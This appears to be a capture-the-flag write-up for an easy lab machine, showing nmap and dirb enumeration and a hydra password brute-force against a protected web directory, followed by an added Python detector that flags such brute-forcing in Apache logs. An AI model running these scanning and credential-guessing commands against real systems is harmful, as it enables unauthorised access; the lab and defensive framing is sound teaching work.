Hello all, today's challenge is made by, it's a fun CTF rated as easy, totally straightforward.

Let's enumerate the machine:

```
nmap -sC -sV 10.10.27.83
```

```
Nmap scan report for (10.10.27.83)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux protocol 2.0)
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
```

We have 22 SSH, 80 HTTP, and another HTTP on 1234 running Tomcat, and 8009 for ajp13. Let's have a look at what we are dealing with on 80 and check if there are any open directories, so we can understand more about what we are trying to break.

```
dirb
```

```
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
DOWNLOADED: 9224 - FOUND:
```

We have a message in the directory /guidelines for Mr. Bob, who maybe forgot to update the Tomcat server, and another one, /protected, that tells us that we are visiting the wrong port. That's fine, because we have more on port 1234.

```
hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.27.83 http-get /protected
```

```
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
host: 10.10.27.83 login: bob password: xxxxxxx
1 of 1 target successfully completed, 1 valid password found
Hydra () finished at
```

We know the user and we brute-forced the password with hydra. Let's dig more and see what we can do with our results so far.
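From the defender's side, the password guessing against /protected leaves a run of 401 responses in the web server's access log, followed by a 200 once a guess succeeds. The following is an added example, not part of the original write-up: it assumes Apache's "combined" log format, and the source addresses, timestamps and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log: host ident user [time] "request" status bytes ...
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def detect_basic_auth_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (ip, path) pairs with >= threshold 401s inside `window` and record
    the user of a later 200 on the same path (a probable guessed password)."""
    recent = defaultdict(list)  # (ip, path) -> 401 timestamps still in window
    findings = {}               # (ip, path) -> finding
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in combined format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        key = (m["ip"], m["path"])
        if m["status"] == "401":
            recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
            if key in findings:
                findings[key]["failures"] += 1
            elif len(recent[key]) >= threshold:
                findings[key] = {"ip": m["ip"], "path": m["path"],
                                 "failures": len(recent[key]), "guessed_user": None}
        elif m["status"] == "200" and key in findings and m["user"] != "-":
            if findings[key]["guessed_user"] is None:
                findings[key]["guessed_user"] = m["user"]
    return list(findings.values())

# Constructed sample: six failed guesses for "bob", then a success, plus one
# unrelated client that mistypes a password once and must not be flagged.
SAMPLE = [
    f'198.51.100.7 - bob [01/Jan/2024:10:00:{s:02d} +0000] '
    '"GET /protected HTTP/1.1" 401 381 "-" "-"' for s in range(6)
] + [
    '198.51.100.7 - bob [01/Jan/2024:10:00:06 +0000] "GET /protected HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /protected HTTP/1.1" 401 381 "-" "-"',
]

if __name__ == "__main__":
    for finding in detect_basic_auth_bruteforce(SAMPLE):
        print(finding)
```

A finding with a non-empty `guessed_user` is the case to act on first: rotate that credential and rate-limit or lock out repeated failures on the protected path.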